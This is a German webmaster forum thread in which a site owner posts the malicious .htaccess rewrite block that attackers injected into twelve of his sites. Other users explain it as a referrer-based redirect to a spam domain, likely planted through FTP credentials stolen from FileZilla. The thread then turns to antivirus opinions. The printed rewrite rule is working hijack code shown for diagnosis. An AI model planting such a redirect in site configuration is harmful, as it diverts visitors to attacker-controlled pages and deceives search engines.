Hacker-Angriff ??!!

Beitrag von **MaxxWald** » 05.01.2013, 12:50

Unsere Webseiten wurden am 02.01.2013 Ziel eines Hackerangriffs, wobei ein Code in insgesamt 12 Webseiten hinterlegt wurde. Hier ist der Code:

#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ xxx.andreasfleiss.com/dtd.php [R=301,L]
</IfModule>

#/336988#

Der Code wurde jeweils in die htaccess eingebaut, wobei dann eine Weiterleitung auf die xxx.andreasfleiss.com/dtd.php (geändert in xxx, sonst www) bestand. Bei Aufruf der Seiten wurden diese dann auf die Domain weitergeleitet.

Fragen:
- Wer hat ähnliches erlebt?
- Wie geht sowas? FTP-Zugang geknackt?
- Alle Seiten bei 1und1 gehostet? Erfolgte dort der Angriff?
- Was soll das ganze?

von **Anzeige von ABAKUS** »

Content Erstellung von ABAKUS Internet Marketing
Ihre Vorteile:

einzigartige Texte
suchmaschinenoptimierte Inhalte
eine sinnvolle Content-Strategie
Beratung und Umsetzung

Jetzt anfragen: 0511 / 300325-0

Beitrag von **MonikaTS** » 05.01.2013, 13:01

was das ganze soll wissen die, die es taten,
wie sie reingekommen sind ist in den Serverlogs nachzuverfolgen
zu90% gehen die meist über den FTP rein,
einfach sichere Verbindungen nutzen, Passwörter regelmäßigst ändern und ein FTP nutzen, dass die Passwörter nicht im Klartext speichert

Beitrag von **todo** » 05.01.2013, 13:11

Filezilla genutzt?

von **Anzeige von ABAKUS** »

Beitrag von **Lyk** » 05.01.2013, 13:14

Beitrag von **ingamint** » 05.01.2013, 13:19

MaxxWald hat geschrieben:- Was soll das ganze?

Der Crapper greift Dir Referer-Traffic ab. Er hofft, dass Du das nicht so schnell bemerkst: denn wenn Du Dir die Seiten normal ansiehst, merkst Du keinen Unterschied. Wer aber z.B. über Google auf Dein Ergebnis klickt, landet dann beim Spamziel.

Wie gehackt? Würde mich da als ersten Verdacht todo anschließen: Dein PC ist gehackt und Du benutzt Filezilla.

Beitrag von **MaxxWald** » 05.01.2013, 13:23

Dazu kommt, dass ich am 31.12. einen Angriff auf meinen Rechner hatte. Ich wollte eine ganz normale Seite im Web besuchen und dann schlug Avira an. Ich hatte mir diesen Bundestrojaner eingefangen. Sofort abgesicherten Modus gefahren, Avira und Malware-Bites drüber fahren lassen.
Ich dachte das Problem wäre erledigt, habe natürlich Filezilla und denke nun, dass so der Server errreicht werden konnte, Schei......

Beitrag von **CitizenX** » 05.01.2013, 13:25

Filezilla speichert die jeweiligen Zugangsdaten unverschlüsselt ab. Wenn Du das Programm nicht regelmässig aktualisierst werden Sicherheitslücken dazu genutzt, die Zugangsdaten auszuspähen.
Gute Alternative: https://www.cyberduck.ch

Gleiches passiert auch, wenn Du Dein Wordpress/Joomla/Typo etc. nicht aktuell hast.

Das ganz ist auch rechtlich nicht ganz unbedenklich und vor allem die Hoster reagieren allergisch.

Beitrag von **todo** » 05.01.2013, 13:26

Filezilla speichert die Passwörter im Klartext, also schnell mal das FTP Programm wechseln und alle Passwörter ändern.

Schau mal hier:
https://www.abakus-internet-marketing.d ... 14300.html

Beitrag von **scysys** » 06.01.2013, 03:03

MaxxWald hat geschrieben:Dazu kommt, dass ich am 31.12. einen Angriff auf meinen Rechner hatte. Ich wollte eine ganz normale Seite im Web besuchen und dann schlug Avira an. Ich hatte mir diesen Bundestrojaner eingefangen. Sofort abgesicherten Modus gefahren, Avira und Malware-Bites drüber fahren lassen.
Ich dachte das Problem wäre erledigt, habe natürlich Filezilla und denke nun, dass so der Server errreicht werden konnte, Schei......

Einerseits bist du wenn du mit Avira unterwegs bist auch etwas selber Schuld

Beitrag von **Exelfoli** » 06.01.2013, 05:33

So ein Kappes, das hätte dir mit jeden anderen Virenscanner auch passieren können.

No Comment.

Beitrag von **CitizenX** » 06.01.2013, 10:01

Kein Kappes, Avira ist Schrott. Wir hatten bis vor kurzem einen PC Reparatur Service und viele Kunden mit Viren. Die hatten durchgehend alle Avira installiert und trotzdem jede Menge Viren. Avira ist vielleicht besser als garnichts zu haben, aber es lässt viel zuviel durch.

Beitrag von **MaxxWald** » 06.01.2013, 11:27

Wohl dem der immer alles richtig macht !!!!

Ich fahr die Woche mal in den Markt, ich bin doch nicht blöd, und kauf mir was anständiges.

Die Frage ist jedoch, was bewirkt dieser o.g. Code? Ist es einfach nur eine Weiterleitung oder steckt da mehr dahinter?

Was erreicht man damit?

Beitrag von **Melegrian** » 06.01.2013, 11:49

MaxxWald hat geschrieben:Die Frage ist jedoch, was bewirkt dieser o.g. Code? Ist es einfach nur eine Weiterleitung oder steckt da mehr dahinter?

Ja, ist einfach nur eine Weiterleitung und sollte nach meinem Verständnis nichts weiter bewirken. Kommt zum Beispiel ein User über die Google-Suche, so wird der weitergeleitet. Kommt hingegen der Googlebot ohne Referrer daher, sollte der nichts von der Weiterleitung mitbekommen. Da Du mit dieser Weiterleitung jedoch unfreiwillig den Usern anderen Content anbietest als den Suchmaschinen, könnte das trotzdem Schaden anrichten und zu einer Abwertung führen, wenn es längere Zeit unbemerkt bleibt.

Beitrag von **Beloe007** » 07.01.2013, 00:44

Habe dieselbe Erfahrung wie citizenx avira kostenlos ist für die Tonne, die kostenpflichtige Verion keine Ahnung wie gut die ist... Macht aber einen besseren Eindruck.

@maxxwald
Warum bin doch nicht blöd unterstützen, kaufe in einem kleinen Laden und lass dich vernünftig beraten.

Zu deinem letzten Beitrag, es kann schon sein das noch mehr gemacht wurde... Im Grunde musst du alles durchschauen.

Beitrag von **CitizenX** » 07.01.2013, 08:32

Besorg Dir Avast Internet Security und dann bist geföhnt und gekämmt. Preis Blödmarkt 39,90, Preis online 34,90. Vorher kannst Du 30 Tage kostenlos testen, nochmal Geld gespart für einen Monat zumindest.

Sowas kauft man nicht im Blödmarkt - wenn Du es online nicht kaufen willst, dann wie Beloe schon sagt bei nem kleinen Fachhändler, die haben es schwer genug.